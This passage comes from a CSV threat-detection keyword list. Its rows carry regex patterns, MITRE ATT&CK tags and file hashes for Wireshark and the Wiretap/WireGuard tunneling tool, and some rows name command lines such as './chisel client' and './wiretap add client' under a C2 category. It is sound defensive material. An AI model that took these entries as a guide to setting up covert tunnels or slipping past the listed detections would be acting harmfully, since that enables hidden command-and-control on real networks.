protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","1","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*Wireshark*.dmg*",".{0,1000}Wireshark.{0,1000}\.dmg.{0,1000}","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","1","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*wireshark-*.tar.xz*",".{0,1000}wireshark\-.{0,1000}\.tar\.xz.{0,1000}","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","1","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*wireshark-common*",".{0,1000}wireshark\-common.{0,1000}","greyware_tool_keyword","wireshark","Wireshark 
is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","1","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*wireshark-dev*",".{0,1000}wireshark\-dev.{0,1000}","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","1","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*wireshark-gtk*",".{0,1000}wireshark\-gtk.{0,1000}","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","1","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*WiresharkPortable64*",".{0,1000}WiresharkPortable64.{0,1000}","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","1","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*wireshark-qt*",".{0,1000}wireshark\-qt.{0,1000}","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","1","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*Wireshark-win*.exe*",".{0,1000}Wireshark\-win.{0,1000}\.exe.{0,1000}","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","1","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" 
"* install wireguard*",".{0,1000}\sinstall\swireguard.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","Defense Evasion","https://github.com/sandialabs/wiretap","1","0","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "* install wireguard-tools*",".{0,1000}\sinstall\swireguard\-tools.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","Defense Evasion","https://github.com/sandialabs/wiretap","1","0","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "* pacman -S wireguard-tools*",".{0,1000}\spacman\s\-S\swireguard\-tools.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","Defense Evasion","https://github.com/sandialabs/wiretap","1","0","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "* wireguard-installer.exe*",".{0,1000}\swireguard\-installer\.exe.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","Defense Evasion","https://github.com/sandialabs/wiretap","1","0","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "* wiretap.exe*",".{0,1000}\swiretap\.exe.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - 
TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*./chisel client *",".{0,1000}\.\/chisel\sclient\s.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","N/A","chisel","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*./wiretap remove*",".{0,1000}\.\/wiretap\sremove.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*/Wireguard.zip*",".{0,1000}\/Wireguard\.zip.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","Defense Evasion","https://github.com/sandialabs/wiretap","1","1","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*/wireguard-amd64-*.msi*",".{0,1000}\/wireguard\-amd64\-.{0,1000}\.msi.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","Defense Evasion","https://github.com/sandialabs/wiretap","1","1","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*/wireguard-installer.exe*",".{0,1000}\/wireguard\-installer\.exe.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges 
to run.","T1572","TA0011 - TA0003","N/A","N/A","Defense Evasion","https://github.com/sandialabs/wiretap","1","1","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*/wireguard-installer.rar*",".{0,1000}\/wireguard\-installer\.rar.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","Defense Evasion","https://github.com/sandialabs/wiretap","1","1","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*/wiretap add client*",".{0,1000}\/wiretap\sadd\sclient.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*/wiretap.conf*",".{0,1000}\/wiretap\.conf.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*/wiretap.Dockerfile*",".{0,1000}\/wiretap\.Dockerfile.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","1","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*/wiretap.exe*",".{0,1000}\/wiretap\.exe.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special 
privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","1","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*/wiretap.git*",".{0,1000}\/wiretap\.git.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","1","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*/wiretap.log*",".{0,1000}\/wiretap\.log.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*/wiretap/releases/download/*",".{0,1000}\/wiretap\/releases\/download\/.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","1","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*/wiretap_*_linux_386.tar.gz*",".{0,1000}\/wiretap_.{0,1000}_linux_386\.tar\.gz.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","1","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*/wiretap_*_linux_amd64.tar.gz*",".{0,1000}\/wiretap_.{0,1000}_linux_amd64\.tar\.gz.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via 
WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","1","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*/wiretap_*_linux_arm64.tar.gz*",".{0,1000}\/wiretap_.{0,1000}_linux_arm64\.tar\.gz.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","1","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*/wiretap_*_linux_armv6.tar.gz*",".{0,1000}\/wiretap_.{0,1000}_linux_armv6\.tar\.gz.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","1","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*/wiretap_*_windows_386.tar.gz*",".{0,1000}\/wiretap_.{0,1000}_windows_386\.tar\.gz.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","1","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*/wiretap_*_windows_amd64.tar.gz*",".{0,1000}\/wiretap_.{0,1000}_windows_amd64\.tar\.gz.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","1","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" 
"*/wiretap_*_windows_arm64.tar.gz*",".{0,1000}\/wiretap_.{0,1000}_windows_arm64\.tar\.gz.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","1","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*/wiretap_*_windows_armv6.tar.gz*",".{0,1000}\/wiretap_.{0,1000}_windows_armv6\.tar\.gz.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","1","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*/wiretap_relay.conf*",".{0,1000}\/wiretap_relay\.conf.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*/wiretap_relay_1.conf*",".{0,1000}\/wiretap_relay_1\.conf.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*/wiretap_server.conf*",".{0,1000}\/wiretap_server\.conf.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - 
TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*/wiretap_server_1.conf*",".{0,1000}\/wiretap_server_1\.conf.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*\WireGuard.lnk*",".{0,1000}\\WireGuard\.lnk.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","Defense Evasion","https://github.com/sandialabs/wiretap","1","0","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*\Wireguard.zip*",".{0,1000}\\Wireguard\.zip.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","Defense Evasion","https://github.com/sandialabs/wiretap","1","0","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*\wireguard-installer.exe*",".{0,1000}\\wireguard\-installer\.exe.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","Defense Evasion","https://github.com/sandialabs/wiretap","1","0","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*\wireguard-installer.rar*",".{0,1000}\\wireguard\-installer\.rar.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special 
privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","Defense Evasion","https://github.com/sandialabs/wiretap","1","0","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*\wiretap.exe*",".{0,1000}\\wiretap\.exe.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*\wiretap.log*",".{0,1000}\\wiretap\.log.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*WireGuard*",".{0,1000}WireGuard.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","Defense Evasion","https://github.com/sandialabs/wiretap","1","0","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*>WireGuard Relay<*",".{0,1000}\>WireGuard\sRelay\<.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*>WireGuard Tunnel<*",".{0,1000}\>WireGuard\sTunnel\<.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 
- TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*>wireguard-installer<*",".{0,1000}\>wireguard\-installer\<.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","Defense Evasion","https://github.com/sandialabs/wiretap","1","0","N/A","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*0164502183613e987753f77bf9a45bde5a08f9332cf2d119cbfbf284cae64a25*",".{0,1000}0164502183613e987753f77bf9a45bde5a08f9332cf2d119cbfbf284cae64a25.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","#filehash","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*0183a78b64841b968eac59c0c912ecb0c44ec0ccdd773e422c6529d4e0ea5ca3*",".{0,1000}0183a78b64841b968eac59c0c912ecb0c44ec0ccdd773e422c6529d4e0ea5ca3.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","#filehash","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*071c1ac9622484472732bfb85fdf11bf4a62d70d4f5d2aeed5a92e9e8be51346*",".{0,1000}071c1ac9622484472732bfb85fdf11bf4a62d70d4f5d2aeed5a92e9e8be51346.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - 
TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","#filehash","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*072c59c3bc429c761425c680611cc35c189582d6837d4b2bd205c648722b51de*",".{0,1000}072c59c3bc429c761425c680611cc35c189582d6837d4b2bd205c648722b51de.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","#filehash","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*0b3128b7117e4575cd58267525750053b8ad2abbff38d586faa4e2b72c7a31db*",".{0,1000}0b3128b7117e4575cd58267525750053b8ad2abbff38d586faa4e2b72c7a31db.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","#filehash","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*0fe131b5d680b328dd8c3286d6c300b0bd606373d3a2de0e6ebec613528bf65d*",".{0,1000}0fe131b5d680b328dd8c3286d6c300b0bd606373d3a2de0e6ebec613528bf65d.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","#filehash","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*106be837e5aca74895a290d85bbcf90f95e4613f41de7d28f9fc834d8f34afad*",".{0,1000}106be837e5aca74895a290d85bbcf90f95e4613f41de7d28f9fc834d8f34afad.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - 
TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","#filehash","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*12d9cf76e82ea590777ee552a9ff96a10b6304df20b141bb2dc7bdf054be8402*",".{0,1000}12d9cf76e82ea590777ee552a9ff96a10b6304df20b141bb2dc7bdf054be8402.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","#filehash","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*14ac418b893997f60d07f0b2ce81ac979ec6ba849664de462cef5c6c720e93f3*",".{0,1000}14ac418b893997f60d07f0b2ce81ac979ec6ba849664de462cef5c6c720e93f3.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","#filehash","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*1c7b04e5a15afed07071240ef6dfda584aede9f24e333463b6e00cdaa3886fc5*",".{0,1000}1c7b04e5a15afed07071240ef6dfda584aede9f24e333463b6e00cdaa3886fc5.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","#filehash","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*1caf54aea406542836d678b35daef36f7dab5c6b271cc9333bf9132fb9a11b5a*",".{0,1000}1caf54aea406542836d678b35daef36f7dab5c6b271cc9333bf9132fb9a11b5a.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - 
TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","#filehash","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*256ade9e6d03ca6e485f0932c122dbd226762d2c29c07414d0dc1dcac2a4eb0b*",".{0,1000}256ade9e6d03ca6e485f0932c122dbd226762d2c29c07414d0dc1dcac2a4eb0b.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","#filehash","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*2d042ee6e000dbf50b37b2fe8a77fb8cc71de9b4beb0f6f902b4d0885ae8facf*",".{0,1000}2d042ee6e000dbf50b37b2fe8a77fb8cc71de9b4beb0f6f902b4d0885ae8facf.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","#filehash","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*2d87b8f3d0a56c9e101271c83e0b4c8f243af14a10965619d037210900304dde*",".{0,1000}2d87b8f3d0a56c9e101271c83e0b4c8f243af14a10965619d037210900304dde.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","#filehash","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*35fb32ecde0afcac0b1feb446052674763484264adae6c09148f4a0c7adac433*",".{0,1000}35fb32ecde0afcac0b1feb446052674763484264adae6c09148f4a0c7adac433.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - 
TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","#filehash","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*5141adc9e35e695f849f9f2a7749a428263d1a02e1efdf24547f53596be97a25*",".{0,1000}5141adc9e35e695f849f9f2a7749a428263d1a02e1efdf24547f53596be97a25.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","#filehash","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*64601caa675146be542b3e4c658019f9c443c8fa64a898985aa691eab5c5037d*",".{0,1000}64601caa675146be542b3e4c658019f9c443c8fa64a898985aa691eab5c5037d.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","#filehash","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*671eaebafae768f136c85087dca3ecc2068283e611f62345d152d843cfcf02ea*",".{0,1000}671eaebafae768f136c85087dca3ecc2068283e611f62345d152d843cfcf02ea.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","#filehash","N/A","10","9","822","36","2024-08-26T17:07:08Z","2022-11-19T00:19:05Z" "*6e44d4eec61c35b14e9e43158b8a169269a98be0e2ae8992cdb0a50ea09b97a1*",".{0,1000}6e44d4eec61c35b14e9e43158b8a169269a98be0e2ae8992cdb0a50ea09b97a1.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - 
